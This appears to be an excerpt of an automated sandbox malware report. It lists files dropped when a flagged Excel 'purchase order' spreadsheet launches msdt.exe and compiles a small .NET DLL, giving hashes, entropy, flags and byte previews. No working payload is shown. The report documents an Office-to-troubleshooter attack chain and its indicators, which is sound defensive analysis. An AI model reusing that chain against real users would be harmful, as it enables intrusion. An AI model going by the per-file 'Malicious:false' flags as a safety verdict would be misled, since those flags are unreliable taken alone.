                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES13B6.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                                            Entropy (8bit):4.1027541743460825
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:H4C9A++fCXXOODfHNhKYDfII+ycuZhNSGakSlXPNnq9Wd:ixCXXO07K2g1ul7a3Xq9m
                                                                                                                                                                                            MD5:8FEBD54D47AB795291C00E5A653BE4F6
                                                                                                                                                                                            SHA1:F1223492FCCFFDF42690645083E72AEE47618D18
                                                                                                                                                                                            SHA-256:0B69D1611DEA610CBDE2B25572D75CC2749E05EB36ECAD7E5D33A3BB5772896A
                                                                                                                                                                                            SHA-512:9B634837EA9FD829CFE4BEE2EDE06C706E85787058241CDCA11BF66DC4D6BAE10CCD96CD5591EB165D590A7E1A0C3A32E0A97A92D4522C0FD677C609317BD986
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP.....................^."|7.n..C..........4.......C:\Users\user\AppData\Local\Temp\RES13B6.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RESF139.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                                            Entropy (8bit):4.114314965892433
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:H6gC9AWZfEGTFw0DfHWFhKYDfII+ycuZhNnakSJPNnq9Wd:fWBZTFwy2zK2g1ulna3rq9m
                                                                                                                                                                                            MD5:8F7E3DC0BAFE313F5CD4C9AF8D658E10
                                                                                                                                                                                            SHA1:4B3A6AEE81EE79CED7D9B6A13A52407D67AC4C9D
                                                                                                                                                                                            SHA-256:4F3476B8E205E0B0908EBD5F50CBFA9776823AECC322FBE2F33366252BCC429A
                                                                                                                                                                                            SHA-512:CD52EAB587B8F33B85E5458CE4DD1FA8455F43C1DE14E6C896161D095551FDB74C313BDE226E35D5ACCDE2AC8132B62214DFCFA16F0650D10BBB8311F341BE89
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP..................X...K.....u..........4.......C:\Users\user\AppData\Local\Temp\RESF139.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.095959176124916
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykaak7YnqqNrPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
                                                                                                                                                                                            MD5:E4A1CF9558A786A84B1619C8E5EDAD75
                                                                                                                                                                                            SHA1:D45ABADD224059F87E1FDF4E2EE2CF16A9DDAA1D
                                                                                                                                                                                            SHA-256:EFDC4288424F961795D5E2C02F93CDD08C0581BA9F6F5A82474732471A4FA216
                                                                                                                                                                                            SHA-512:624668625F58B06B84E82B984E34059F14F6EE4C25AFBCB192A2DFC2338285C79B5872B4F8167695C2659D52E2031342BEC78C8F449C6F58FA3CA176021DFF47
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                                            Entropy (8bit):3.7814229864516253
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:63oPhmKraYZkH8KTibUyXkwjj0JOC+CFSlwY9c1ulna3rq:1DaAkHHo5k8hCuZlK
                                                                                                                                                                                            MD5:CA38C4E07EE62DF319C8D61BFDB96BCA
                                                                                                                                                                                            SHA1:8840EFA9C96F5793650FDB7EB7396A4910082235
                                                                                                                                                                                            SHA-256:B557E8D652DBB7E83CBE18AF2557802FCD2B435EE30CD052E60D44C77844074E
                                                                                                                                                                                            SHA-512:C8162752A07C0970A9247F389BF5774ED1EFDB73F6319DFED55AAD190E2F6C33E6FB9D487EB9AA616A9C1E5BE1F5D7199A1339A2E9D0483F047DE40860B700B5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2B6201859A4F0F2C.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:CDFV2 Encrypted
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):72696
                                                                                                                                                                                            Entropy (8bit):7.868306503118196
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
                                                                                                                                                                                            MD5:A8930C1FCD80E9965AE26446AFB717F6
                                                                                                                                                                                            SHA1:0CBF04BF7FC8522AB983F0246357FA70A85EE56B
                                                                                                                                                                                            SHA-256:C02FF7B4D28A259D37A659A6951DBA4EE574562EF5FC3B3A0135640C0370DEE2
                                                                                                                                                                                            SHA-512:EAD35C97BFCCB344ED5837E82E1F648E518C52A1C6C67BD6511E018B4DC2D1364AE1F6B7DDAD69F02E58AA417402327AC3E36F175220C2C6F72FC01D4758B77F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF477F7B9558984353.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF82DC9C2209D4F75C.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFA791BA4295C35A78.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\Desktop\~$purchase order.xlsx

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):165
                                                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                            MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                            SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                            SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                            SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.diagpkg

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: WF0SlQWKr1.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: V3g2Pfu707.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 5YMh6S8QVr.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: ZDhoKQk8G6.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: TranQuangDai.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 68101181_048154.img, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc1712.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\CL_LocalizationData.psd1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                                            Malicious:false
